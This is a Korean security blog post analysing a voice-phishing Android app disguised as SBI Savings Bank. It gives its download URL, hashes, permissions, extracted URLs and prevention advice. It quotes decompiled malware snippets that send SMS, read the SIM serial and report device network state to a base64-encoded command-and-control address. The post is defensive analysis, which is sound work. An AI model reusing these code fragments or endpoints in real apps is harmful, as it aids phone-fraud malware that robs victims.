오늘은 SBI 저축은행으로 속이는 보이스피싱 앱인 sbibank.apk(2021.3.28)에 대해 분석을 하는 시간을 가져 보겠습니다.
감염이 되는 경로는 다음과 같습니다.
hxxp://154.23.55(.)21/sbi/ -> hxxp://154.23.55(.)21/sbi/sbibank(.)apk 입니다.
해쉬값은 다음과 같습니다.
파일명: sbibank.apk
사이즈:9,161,476 Bytes
작성일시: 2021-03-25 22:07:31 (+09:00)
수정일시: 2021-03-25 22:06:57 (+09:00)
접근일시: 2021-03-25 22:07:31 (+09:00)
CRC32: 49c19d9a
![](http://t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png)
![](http://t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png)
MD5:5cc6733864fc69a545be3aa44316a122
SHA-1:09e06bca19b8a7f266502cc53366ae6d0e6f5475
SHA-256:546f93d93d47c422b3193864c872a64f87fabd1dab845eecbf68195c41d35207
악성코드 이름과 패키지 이름은 다음과 같습니다.
app_name: 바빌론
package_name:net.threetensix3.tek.views20210323
입니다. 그리고 악성코드 권한은 다음과 같이 총 21개로 이루어져 있습니다.
![](http://t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png)
android.permission.CALL_PHONE
android.permission.READ_PHONE_STATE
android.permission.SYSTEM_ALERT_WINDOW
android.permission.WAKE_LOCK
android.permission.DISABLE_KEYGUARD
android.permission.READ_PHONE_NUMBERS
android.permission.READ_CALL_LOG
android.permission.READ_CONTACTS
android.permission.WRITE_CONTACTS
android.permission.RECORD_AUDIO
android.permission.MODIFY_AUDIO_SETTINGS
android.permission.ACCESS_FINE_LOCATION
android.permission.RECEIVE_USER_PRESENT
android.permission.INTERNET
![](http://t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png)
android.permission.PROCESS_OUTGOING_CALLS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.WRITE_CALL_LOG
android.permission.ANSWER_PHONE_CALLS
android.permission.READ_SMS
android.permission.CAMERA
android.hardware.camera
android.hardware.camera.autofocus
android.permission.FOREGROUND_SERVICE
android.permission.GET_TASKS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.REORDER_TASKS
android.hardware.telephony
android.permission.SYSTEM_ALERT_WINDOW
android.permission.READ_EXTERNAL_STORAGE
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.ACCESS_NETWORK_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
android.permission.FLASHLIGHT
일단 악성코드 권한을 보면 음성녹음, 연락처 접근해서 읽고 쓰기, 카메라 작동, 전화번호 읽고 쓰기, 외장 디스크 접근 및 읽고 쓰고 와이파이 접근 등이 보이는 것을 볼 수가 있으면 해당 악성코드가 설치되면 그냥 스마트폰 권한을 한방에 다 넘어가는 구조로 되어 있고 그리고 당연히 경찰, 은행 등으로 지원을 받고 싶어서 전화번호를 입력해서 전화를 걸어도 당연히 스마트폰 권한은 이미 넘어갔기 때문에 전화금융사기 일당으로 전화가 연결되는 것이 당연합니다.
![](http://t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png)
그리고 net.threetensix3. tek.tools.k 부분에서는 다음과 같이 스마트폰에 있는 문자에 접근하는 코드가 있는 것을 볼 수가 있습니다.
public static boolean b(String paramString1, String paramString2) {
try {
SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
return true;
} catch (Exception exception) {
exception.printStackTrace();
return false;
}
}
}
com.umeng.commonsdk.internal.utils.k 에서는 iccid,imemi 정보를 획득하기 위한 코드들도 보이는 것을 확인할 수가 있습니다.
public static String b(Context paramContext) {
String str2 = null;
String str1 = str2;
if (paramContext != null) {
str1 = str2;
if (UMUtils.checkPermission(paramContext, "android.permission.READ_PHONE_STATE")) {
TelephonyManager telephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (telephonyManager == null)
return null;
str1 = telephonyManager.getSimSerialNumber();
}
}
return str1;
}
그리고 간단하게 Bytecode-Viewer를 통해서 url(인터넷 주소)를 확인을 해 보면 다음과 같이 들어가 져 있습니다.
뭐 중국어가 들어가 져 있는 것도 볼 수가 있습니다.
예를 들어서 다음과 같습니다.
发送数据时发生:데이터를 보낼 때 발생
异常,导致友盟后端域名解析失败。请检查系统DNS服务器配置是否正确。详见链接: 예외로 말미암아 Umeng 백엔드 도메인 이름 확인이 실패했습니다. 시스템 DNS 서버 구성이 올바른지 확인하십시오. 자세한 내용은 링크를 참조하십시오.
统计SDK常见问题索引贴 详见链接:Statistics SDK FAQ Index Post 자세한 내용은 링크 참조
등과 중국어가 들어가 져 있는것을 볼 수가 있으면 앞서 피싱 사이트 국기를 보면 홍콩인 것을 확인할 수가 있습니다. 대충 중국에서 만들어진 것이 아닐까. 라는 추측할 수가 있는 부분입니다.
![](http://t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png)
그리고 해당 악성코드에 포함된 URL은 다음과 같습니다.
hxxp://a6190c13118f4cf2846e787fc492c0a6@103(.)93.79.32:9000/8
hxxps://developer(.)umeng.com/docs/66632/detail
hxxps://cmnsguider(.)yunos.com:443/genDeviceToken
hXXps://ulogs(.)umeng.com/unify_logs
hxxps://mozilla(.)org/MPL/2.0/
hxxs://alogsus(.)umeng.com/unify_logs
hxxps://ouplog(.)umeng.com",
hxxp://schemas(.)android.com/apk/res-auto
hxxps://alogus(.)umeng.com/unify_logs
hxxp://schemas(.)android.com/apk/res/android
4RR(.)WRS/Wn
vnd(.)android.cursor.item/phone_v2
hxxps://plbslog(.)umeng.com
hxxps://ulogs(.)umengcloud.com/unify_logs
vnd(.)android.cursor.item/name
hxxp://ns(.)adobe.com/xap/1.0
hxxps://publicsuffix(.)org/list/public_suffix_list.dat
입니다.
![](http://t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png)
net.threetensix3.tek.tools.NetStateChangeReceiver 부분에서 악성코드 트래픽을 암호화해서 보내는 것을 볼 수가 있습니다.
public void onReceive(Context paramContext, Intent paramIntent) {
if (paramIntent != null && paramIntent.getAction() != null && "android.net.conn.CONNECTIVITY_CHANGE".equals(paramIntent.getAction())) {
n n1 = o.b(paramContext);
b(n1);
SharedPreferences sharedPreferences = paramContext.getSharedPreferences("networkType", 0);
if (!n1.equals("") && !sharedPreferences.getString("networkType", "").equals(n1)) {
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.append(new String(Base64.decode("aHR0cDovLzEwMy4xNTkuODAuODU=", 2)));
stringBuilder.append(":");
stringBuilder.append("8779");
stringBuilder.append("/api/signal/");
stringBuilder.append(d.b.a.a.a.a);
stringBuilder.append("/");
stringBuilder.append(n1.toString());
stringBuilder.append("/");
a(stringBuilder.toString());
SharedPreferences.Editor editor = sharedPreferences.edit();
editor.putString("networkType", n1.toString());
editor.commit();
}
}
여기서 aHR0cDovLzEwMy4xNTkuODAuODU 이라는 것이 보일 것인데 이것이 연결되면 hxxp://103(.)159.80.95 즉 C&C server(C&C 서버)로 연결이 되는 것을 확인할 수가 있습니다. 일단 이런 악성코드에 감염되기 싫은 분들은 일단 기본적으로 주소를 잘 보면 숫자로 돼 있으면 100% 피싱 사이트 라고 생각을 하시면 될 것이면 이런 것을 예방하기 위해서 공식 스토어 이외에 앱을 설치를 하지 말고 스마트폰에서 외부에서 앱을 설치를 하려고 하면 분명히 경고합니다.
그 경고 무시 하시 하는 행동을 하시면 안 됩니다. 그리고 공식력 있는 V3,Eset 같은 백신앱을 설치를 해서 안전하게 스마트폰을 사용하시길 바랍니다. 일단 2021.03.25 23:03 KST 기준을 탐지가 안 되는 V3에 AhnRpt 통해서 해당 악성코드를 신고해 두었습니다. 일단 조만간에 업데이트가 되어서 탐지가 될 것이며 그리고 항상 공식 스토어를 이용을 하고 다른 곳 즉 외부에서는 앱을 다운로드 및 설치를 하는 것을 하지 말아야 합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
Have I Been Pwned 유출 된 Facebook 전화 번호 검색 방법 (2) | 2021.04.09 |
---|---|
페이스북 계정 개인정보 유출유무 확인 방법 (4) | 2021.04.06 |
보이스피싱 악성코드-혼자만봐.apk(2021.03.31) (6) | 2021.04.02 |
윈도우 10 KB5000842 누적 업데이트로 인한 프리징 현상 해결 업데이트 (2) | 2021.04.01 |
파이어폭스 87.0 보안 업데이트 (0) | 2021.03.25 |
안랩 V3 랜섬웨어 보호폴더 설정 방법 (8) | 2021.03.24 |
윈도우 10 프린터 인쇄 문제를 해결을 위한 두번쨰 KB5001649 업데이트 (2) | 2021.03.20 |
Malwarebytes Windows Firewall Control(멀웨어바이츠 윈도우 방화벽 컨트롤)느낌표 로 표시 될떄 해결 방법 (8) | 2021.03.15 |